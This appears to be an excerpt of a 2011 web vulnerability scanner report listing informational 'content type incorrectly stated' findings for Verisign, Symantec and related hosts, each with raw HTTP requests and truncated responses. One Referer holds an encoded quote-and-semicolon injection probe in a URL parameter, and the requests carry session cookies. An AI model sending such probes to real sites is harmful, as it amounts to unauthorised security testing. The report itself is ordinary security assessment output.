GET /authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg HTTP/1.1 Host: cdn.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Server: Apache ETag: "29304aa-381d-49d8465fa77c0" Accept-Ranges: bytesContent-Type: image/jpeg Age: 27502 Date: Fri, 09 Sep 2011 21:25:05 GMT Last-Modified: Wed, 02 Mar 2011 18:51:19 GMT Expires: Sun, 09 Oct 2011 13:46:43 GMT Content-Length: 14365 Connection: keep-alive GIF89a.....................3.....K..{...................................................................................s...............................s...u....Bh..................... !!.....f...QXVw...[SNIP]...
23.5. http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://cdn.verisign.com
Path:
/authweb/en_ch/assets/shared/js/google-analytics.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/en_ch/assets/shared/js/google-analytics.js HTTP/1.1 Host: cdn.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, publicContent-Type: text/html Vary: Accept-Encoding Age: 27500 Date: Fri, 09 Sep 2011 21:25:03 GMT Expires: Sun, 09 Oct 2011 13:46:43 GMT Content-Length: 460 Connection: keep-alive var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-295855-1']); _gaq.push(['_setDomainName', '.verisign.ch']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('scri...[SNIP]...
23.6. http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.cacheimage.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/shared/js/jquery.cacheimage.js HTTP/1.1 Host: cdn.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, publicContent-Type: text/html Vary: Accept-Encoding Age: 73854 Date: Fri, 09 Sep 2011 21:25:44 GMT Expires: Sun, 09 Oct 2011 18:24:34 GMT Content-Length: 1356 Connection: keep-alive /* * cacheImage: a jQuery plugin * * cacheImage is a simple jQuery plugin for pre-caching images. The * plugin can be used to eliminate flashes of unstyled content (FOUC) and * improve perceived...[SNIP]...
23.7. http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/shared.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/shared/js/shared.js HTTP/1.1 Host: cdn.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, publicContent-Type: text/html Vary: Accept-Encoding Age: 69510 Date: Fri, 09 Sep 2011 21:24:45 GMT Expires: Sun, 09 Oct 2011 05:58:30 GMT Content-Length: 37327 Connection: keep-alive // FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js /* * cacheImage: a jQuery plugin * * cacheImage is a simple jQuery plugin for pre-caching images. The * plug...[SNIP]...
23.8. http://cdn.verisign.com/stellent/groups/public/documents/image/dev041741.jpg
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://cdn.verisign.com
Path:
/stellent/groups/public/documents/image/dev041741.jpg
Issue detail
The response contains the following Content-type statement:The response states that it contains a JPEG image . However, it actually appears to contain a GIF image .
Request
GET /stellent/groups/public/documents/image/dev041741.jpg HTTP/1.1 Host: cdn.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/partners/ssl-reseller-programs/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623583|PC#1315621455064-973488.19#1378693723|check#true#1315621783
Response
HTTP/1.1 200 OK Server: Apache ETag: "690418-c9f-49a38f3161780" Accept-Ranges: bytesContent-Type: image/jpeg Date: Fri, 09 Sep 2011 21:28:14 GMT Last-Modified: Wed, 19 Jan 2011 20:34:54 GMT Expires: Sun, 09 Oct 2011 19:44:53 GMT Content-Length: 3231 Connection: keep-alive GIF89a..9.....dz.Ki.e|.....7........".r............D....z........Hd....../22....Ti......iii.)Q...............}}}.....A........+...aaa.....JKK...XXX.$..*J.......q.................Rr........).......f{....[SNIP]...
23.9. https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://cdn.verisign.com
Path:
/authweb/en_us/assets/shared/js/google-analytics.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/en_us/assets/shared/js/google-analytics.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:52 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 69191 Expires: Sun, 09 Oct 2011 02:25:41 GMT Content-Length: 461 var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-295855-1']); _gaq.push(['_setDomainName', '.verisign.com']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('scr...[SNIP]...
23.10. https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/header/js/flyouts.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/header/js/flyouts.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:43 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 13 Expires: Sun, 09 Oct 2011 21:38:30 GMT Content-Length: 8048 //----------------------------------------// // My Account M-flyout form functionality //----------------------------------------// $("#myacc_search_btn").click(function(){ //document.get...[SNIP]...
23.11. https://cdn.verisign.com/authweb/global/assets/header/js/header.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/header/js/header.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/header/js/header.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:43 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 13 Expires: Sun, 09 Oct 2011 21:38:30 GMT Content-Length: 1558 /******************************************* ** Header functions ** *******************************************/ //----------------------------------------// //Load Defaults when DOM i...[SNIP]...
23.12. https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/header/js/jquery.autocomplete.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/header/js/jquery.autocomplete.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:44 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 14 Expires: Sun, 09 Oct 2011 21:38:30 GMT Content-Length: 22148 /* * jQuery Autocomplete plugin 1.1 * * Copyright (c) 2009 J..rn Zaefferer * * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * ht...[SNIP]...
23.13. https://cdn.verisign.com/authweb/global/assets/home/js/home.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/home/js/home.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/home/js/home.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:48 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 16 Expires: Sun, 09 Oct 2011 21:38:32 GMT Content-Length: 2725 /******************************************* ** HP specific functions ** *******************************************/ //External link functionality $('a[rel="external"]').click(funct...[SNIP]...
23.14. https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/global-preload.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain CSS .
Request
GET /authweb/global/assets/shared/js/global-preload.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 69230 Expires: Sun, 09 Oct 2011 02:24:38 GMT Content-Length: 135518 // FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.js /*! * jQuery JavaScript Library v1.4.4 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the M...[SNIP]...
23.15. https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/google-analytics.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/shared/js/google-analytics.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:38:28 GMT Content-Length: 471 var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-295855-1']); _gaq.push(['_setDomainName', '.verisign.com']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElemen...[SNIP]...
23.16. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.boxshadow.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/shared/js/jquery.boxshadow.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:38:27 GMT Content-Length: 1538 /* ** * jquery-boxshadow.js * * $(object).boxshadow({ * hOffset : 3, * vOffset : 3, * shadowblur : 3, * color : '#808080' * }) * * If you are using this with IE, you should s...[SNIP]...
23.17. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.cacheimage.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/shared/js/jquery.cacheimage.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:27 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 1 Expires: Sun, 09 Oct 2011 21:38:26 GMT Content-Length: 1356 /* * cacheImage: a jQuery plugin * * cacheImage is a simple jQuery plugin for pre-caching images. The * plugin can be used to eliminate flashes of unstyled content (FOUC) and * improve perceived...[SNIP]...
23.18. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.hover_intent.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/shared/js/jquery.hover_intent.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 39037 Expires: Sun, 09 Oct 2011 10:47:51 GMT Content-Length: 1614 /** * hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+ * <http://cherne.net/brian/resources/jquery.hoverIntent.html> * * @param f onMouseOver function || An object with configuration options * @p...[SNIP]...
23.19. https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/oo-engine.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/shared/js/oo-engine.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:38:28 GMT Content-Length: 1154 /* OnlineOpinion (S3tS v3.1) */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ var custom_var,...[SNIP]...
23.20. https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/rotator.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:35 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 77341 Expires: Sun, 09 Oct 2011 00:09:34 GMT Content-Length: 4102 var activeBannerId = ""; var activeBannerControllerId = ""; var activeTipId = ""; var rotate = true; var myBannerNumber = 1; var activeBannerNumber = myBannerNumber; var bannerItemsLength = $(...[SNIP]...
23.21. https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/shared.js
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /authweb/global/assets/shared/js/shared.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:29 GMTContent-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:38:29 GMT Content-Length: 37327 // FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js /* * cacheImage: a jQuery plugin * * cacheImage is a simple jQuery plugin for pre-caching images. The * plug...[SNIP]...
23.22. https://cert.webtrust.org/ViewSeal
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://cert.webtrust.org
Path:
/ViewSeal
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain plain text .
Request
GET /ViewSeal HTTP/1.1 Host: cert.webtrust.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 20:14:30 GMT Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector) X-Cache: MISS from cert.webtrust.org Connection: closeContent-Type: text/html Content-Length: 2834 java.lang.NumberFormatException: null at java.lang.Integer.parseInt(Integer.java:394) at java.lang.Integer.parseInt(Integer.java:476) at ca.cica.servlets.WebContext.getFormInt(WebContext.java:29) ...[SNIP]...
23.23. http://com-verisign.netmng.com/
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://com-verisign.netmng.com
Path:
/
Issue detail
The response contains the following Content-type statement:Content-Type: text/html; charset=UTF-8 The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /?async=1&ref= HTTP/1.1 Host: com-verisign.netmng.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=; EVO5_OPT=1; evo5_VERISIGN=xep22ngsyerii%7CzPCBedpYRoO6OzhXoTF9q%2FaQjQpstH0WqFCxsh5%2B48J3547ECvJaebMq81oWRc3MP36Ne8FDKqi2tKvM0qAtvn5eUZVLjXQuMBCzsj9xlU6q8vkojmNUdsxdhJSq0RYJ%2FgEF5%2FA69puw0HLQJ9EPXM6sL1Ue6IGucoZYZgTJQnZo9CTdABHM4ueiLU%2FDJA8GIJKj5bIIOmyH%2FBCLQ0VIEg%3D%3D
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:39 GMT Server: Apache/2.2.9 P3P: policyref="http://com-verisign.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV" Expires: Wed, 07 Sep 2011 21:24:39 GMT Last-Modified: Wed, 07 Sep 2011 21:24:39 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: evo5_VERISIGN=xep22ngsyerii%7ChA01%2FrwSc8JE1KL%2BNF3RVTo25kmnDoHeqB4wQZyhagZZu%2F%2BudZozezKeJLE7KBK%2BUjUxXlIeDROFZHLovHD35a7MzKnV4tnniULPz80oJzXTjZCQuH3rEYszto4j5kdWKlao%2B92ozzrCF1iFudKJH42aETL2etzFNY%2F7zPIZWcbiqGvcagHruGjsS4FSqBNpnzLrgd77H3EQG8j%2FXWqODQ%3D%3D; expires=Sat, 10-Mar-2012 21:24:39 GMT; path=/ Content-Length: 3418 Connection: closeContent-Type: text/html; charset=UTF-8 function json_encode(expr){var str='';switch(typeof(expr)){case"object":if(expr==null){str="null"}else if(expr.constructor==Date){str="\""+expr.getFullYear()+"-"+String(exp.getMonth()+100).substr(1)+"...[SNIP]...
23.24. https://fileconnect.symantec.com/images/Sigstand.jpg
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://fileconnect.symantec.com
Path:
/images/Sigstand.jpg
Issue detail
The response contains the following Content-type statement:The response states that it contains a JPEG image . However, it actually appears to contain a GIF image .
Request
GET /images/Sigstand.jpg HTTP/1.1 Host: fileconnect.symantec.com Connection: keep-alive Referer: https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_USba9ab%22%3b528b7643cdb User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 22:03:56 GMT Content-length: 2534Content-type: image/jpeg Last-Modified: Sat, 21 May 2011 05:26:42 GMT Accept-Ranges: bytes GIF89a..%..........ddd........k..............................oR.........VCCC...]]]$$$.................3...222..,...<<<......vvv......XXX+++...............mmmppp.....{UUU...yyy.....D.........jjj..&.......[SNIP]...
23.25. http://free.pctools.com/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://free.pctools.com
Path:
/favicon.ico
Issue detail
The response contains the following Content-type statement:Content-Type: text/plain; charset=UTF-8 The response states that it contains plain text . However, it actually appears to contain unrecognised content .
Request
GET /favicon.ico HTTP/1.1 Host: free.pctools.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: reftrack=freesite%2320110909170147; PHPSESSID=68o0726o7nflfg28ire9iju5j2; __utma=9079138.240734855.1315623957.1315623957.1315623957.1; __utmb=9079138.1.10.1315623957; __utmc=9079138; __utmz=9079138.1315623957.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=1.1056361608.1315623957.1315623957.1315623957.1; __utmb=1.0.10.1315623957; __utmc=1; __utmz=1.1315623957.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Tue, 07 Dec 2010 03:15:40 GMT ETag: "738b5b-57e-496c96b526f00" Accept-Ranges: bytes Content-Length: 1406Content-Type: text/plain; charset=UTF-8 Date: Fri, 09 Sep 2011 22:05:57 GMT Connection: close ..............h.......(....... .................................\...............6.......M...G...H...[.......5.......U...........X...J...3...k...i...W...O.......?...i...W...|...............K...K..........[SNIP]...
23.26. http://gs.instantservice.com/geoipAPI.js
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://gs.instantservice.com
Path:
/geoipAPI.js
Issue detail
The response contains the following Content-type statement:Content-Type: text/javascript; charset=utf-8 The response states that it contains script . However, it actually appears to contain plain text .
Request
